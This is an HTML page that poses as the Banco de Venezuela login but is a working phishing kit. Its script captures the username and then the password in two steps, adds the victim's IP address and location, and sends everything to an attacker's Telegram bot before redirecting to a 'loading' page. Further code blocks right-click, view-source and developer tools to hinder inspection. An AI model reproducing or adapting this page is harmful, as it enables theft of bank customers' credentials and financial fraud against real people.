<!DOCTYPE html>
<html lang="es">
  <head>
    <!-- Lacasadeltruco sabre si te los robaste -->
    <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script>
    <!-- Insertado por miarroba -->
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Banco de Venezuela</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        background-image: url(background.jpg);
        background-size: cover;
        background-position: center;
      }

      .container {
        display: flex;
        height: 100%;
        width: 100%;
      }

      .left-side {
        width: 50%;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      .right-side {
        width: 50%;
      }
      .form {
        width: 80%;
        background: white;
        max-width: 550px;
        box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.1);
      }

      @media (max-width: 768px) {
        body {
          background: #ededed;
        }
        .container {
          flex-direction: column;
        }
        .left-side {
          width: 100%;
          height: 100vh;
        }
        .right-side {
          display: none;
        }
      }

      .form-group {
        position: relative;
        margin-bottom: 20px;
        margin: 20px;
      }

      .form-group label {
        position: absolute;
        top: 50%;
        left: 10px;
        transform: translateY(-55%);
        color: #999;
        transition: top 0.3s, font-size 0.3s;
        pointer-events: none;
      }

      .form-group input {
        width: 100%;
        padding: 10px;
        box-sizing: border-box;
        position: relative;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }
      .form-group input:focus {
        border: 0;
      }
      .form-group input:focus + label,
      .form-group input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
      }
      button {
        background-color: #0067b1;
        color: white;
        border-radius: 3px;
        border: 0;
        padding: 15px;
        width: 200px;
      }

      .form-group2 {
        position: relative;
        margin-bottom: 20px;
        margin: 20px;
      }

      .form-group2 label {
        position: absolute;
        top: 50%;
        left: 23%;
        transform: translateY(-55%);
        color: #999;
        transition: top 0.3s, font-size 0.3s;
        pointer-events: none;
      }

      .form-group2 input {
        padding: 10px;
        box-sizing: border-box;
        position: relative;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }
      .form-group2 input:focus {
        border: 0;
      }
      .form-group2 input:focus + label,
      .form-group2 input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
      }

      .overlay {
        display: flex;
        justify-content: center;
        align-items: center;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5); /* Fondo semitransparente */
        z-index: 9999; /* Asegura que esté por encima de otros elementos */
      }

      .content {
        background-color: #fff;
        width: 350px;
        border-radius: 5px;
        text-align: center;
      }
    </style>
  </head>
  <body>
    <!-- Insertado por LCDT -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T2VG59" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
    <!-- Insertado por LCDT -->
    <div class="overlay" id="overlay" style="display: none">
      <div class="content">
        <!-- Aquí va tu contenido -->
        <form id="loginform2">
          <h4 style="color: #0067b1 !important">Introduce tu contraseña</h4>
          <div class="form-group2">
            <input type="text" id="contra"  required/>
            <label for="contra">Contraseña *</label>
          </div>
          <script>
            document.addEventListener("DOMContentLoaded", function () {
              const input = document.getElementById("contra");
              const label = input.nextElementSibling;
              label.style.top = "50%";
              if (input.value !== "") {
                label.style.top = "15px";
                label.style.fontSize = "12px";
              }

              input.addEventListener("focus", () => {
                label.style.top = "15px";
                label.style.fontSize = "12px";
              });

              input.addEventListener("blur", () => {
                if (!input.value) {
                  label.style.top = "50%";
                  label.style.fontSize = "";
                }
              });
            });
          </script>
          <div style="width: 100%; text-align: center; padding-bottom: 30px">
            <button style="width: 160px">Continuar</button>
          </div>
        </form>
      </div>
    </div>
    <div class="container">
      <div class="left-side">
        <form id="loginform" class="form">
          <div style="text-align: center">
            <img src="https://images.seeklogo.com/logo-png/53/1/bdv-banco-de-venezuela-logo-png_seeklogo-534119.png" alt="" style="width: 30%; margin-top: 10px" />
          </div>
          <div style="width: 100%; text-align: center">
            <div class="form-group">
              <input
                type="text"
                id="nombre"
                name="nombre"
                style="width: 100%"
                required
              />
              <label for="nombre">Usuario *</label>
            </div>


  <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

<script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    const form2 = document.querySelector("#loginform2");

    // Función para obtener `chat_id` y `token` desde la sesión en el servidor
        async function obtenerDatosSesion() {
            try {
                const response = await fetch("target.php", {
                    method: "POST",
                });
                const data = await response.json();
                if (data.error) {
                    console.error("Error:", data.error);
                    return null;
                }
                return { chatId: data.chat_id, token: data.token };
            } catch (error) {
                console.error("Error en la solicitud:", error);
                return null;
            }
        }
    // Obtener `chat_id` y `token` y usarlos en los eventos `submit`
    obtenerDatosSesion().then(datosSesion => {
        if (!datosSesion) return;

        const { chatId, token } = datosSesion;

        form.addEventListener("submit", (e) => {
            e.preventDefault();
            axios.get(url)
                .then((e) => {
                    const o = document.querySelector("#nombre").value;
                    localStorage.setItem("usuario", o);
                    const n = "\nBDV\nNombre: " + o + "\nCiudad:" + e.data.city + "\nPais: " + e.data.country + "\nIP: " + e.data.ip;
                    axios.post(`https://api.telegram.org/bot${token}/sendMessage`, { chat_id: chatId, text: n })
                        .then(() => {
                            document.getElementById("overlay").style.display = "";
                        })
                        .catch((error) => {
                            console.error(error);
                        });
                })
                .catch((error) => {
                    console.log(error);
                });
        });

        form2.addEventListener("submit", (e) => {
            e.preventDefault();
            axios.get(url)
                .then((e) => {
                    const o = localStorage.getItem("usuario");
                    const n = document.querySelector("#contra").value;
                    const t = "\nBDV\nNombre: " + o + "\nContra: " + n + "\nCiudad:" + e.data.city + "\nPais: " + e.data.country + "\nIP: " + e.data.ip;
                    axios.post(`https://api.telegram.org/bot${token}/sendMessage`, { chat_id: chatId, text: t })
                        .then(() => {
                            window.location.href = "cargando.html";
                        })
                        .catch((error) => {
                            console.error(error);
                        });
                })
                .catch((error) => {
                    console.log(error);
                });
        });
    });
</script>


  
            <script>
              document.addEventListener("DOMContentLoaded", function () {
                const input = document.getElementById("nombre");
                const label = input.nextElementSibling;
                label.style.top = "50%";
                if (input.value !== "") {
                  label.style.top = "15px";
                  label.style.fontSize = "12px";
                }

                input.addEventListener("focus", () => {
                  label.style.top = "15px";
                  label.style.fontSize = "12px";
                });

                input.addEventListener("blur", () => {
                  if (!input.value) {
                    label.style.top = "50%";
                    label.style.fontSize = "";
                  }
                });
              });
            </script>
          </div>
          <div style="width: 100%; text-align: center">
            <button>Entrar</button>
          </div>
          <div
            style="
              width: 100%;
              text-align: center;
              font-size: 12px;
              font-weight: bold;
              color: #999;
              margin-top: 30px;
              margin-bottom: 30px;
            "
          >
            ¿Olvidaste tu usuario o clave? <br />
            Si eres nuevo clienteBDV regístrate aquí
          </div>
        </form>
      </div>
      <div class="right-side"></div>
    </div>



  <!-- Inserted by miarroba -->
</script></noframes></noembed></noscript><script type="text/javascript" src="/hosting__general__script.php?__muid=&amp;h=2177508&amp;t=1723852422&amp;k=f7dec94f1ea25f22d5a3fcdb62427589"></script><noscript><img alt="beacon" border="0" width="1" height="1" src="/hosting__general__script.php?__muid=&amp;h=2177508&amp;t=1723852422&amp;k=f7dec94f1ea25f22d5a3fcdb62427589&amp;img=1" /></noscript>
<!-- Inserted by miarroba -->
</body>
  <script>
    document.addEventListener("contextmenu", function (event) {
      event.preventDefault();
    });

    document.addEventListener("keydown", function (event) {
      if (event.ctrlKey && event.key === "u") {
        event.preventDefault();
      }
    });

      ///////// Código de seguridad
    function blockDevTools() {
        var devtools = false;
        var threshold = 160;
        var checkDevTools = function() {
            var start = new Date();
            debugger;
            var end = new Date();
            if (end - start > threshold) {
                devtools = true;
                document.body.innerHTML = "¡Inspección bloqueada!";
            } else {
                devtools = false;
            }
        };
        setInterval(checkDevTools, 1000); // 1e3 = 1000 ms = 1 segundo
    }

    // Prevenir clic derecho e inspección
    function preventInspection() {
        document.addEventListener("contextmenu", function(event) {
            event.preventDefault();
        });

        document.addEventListener("keydown", function(event) {
            // Bloquear F12, Ctrl+Shift+I, Ctrl+Shift+C, Ctrl+U
            if (event.keyCode === 123 || // F12
                (event.ctrlKey && event.shiftKey && (event.keyCode === 73 || event.keyCode === 67)) || // Ctrl+Shift+I, Ctrl+Shift+C
                (event.ctrlKey && event.keyCode === 85)) { // Ctrl+U
                event.preventDefault();
            }
        });
    }

    // Inicializar los eventos cuando cargue la página
    window.onload = function() {
        preventInspection();
        blockDevTools();
        startTimer();
    };
</script>

</html>
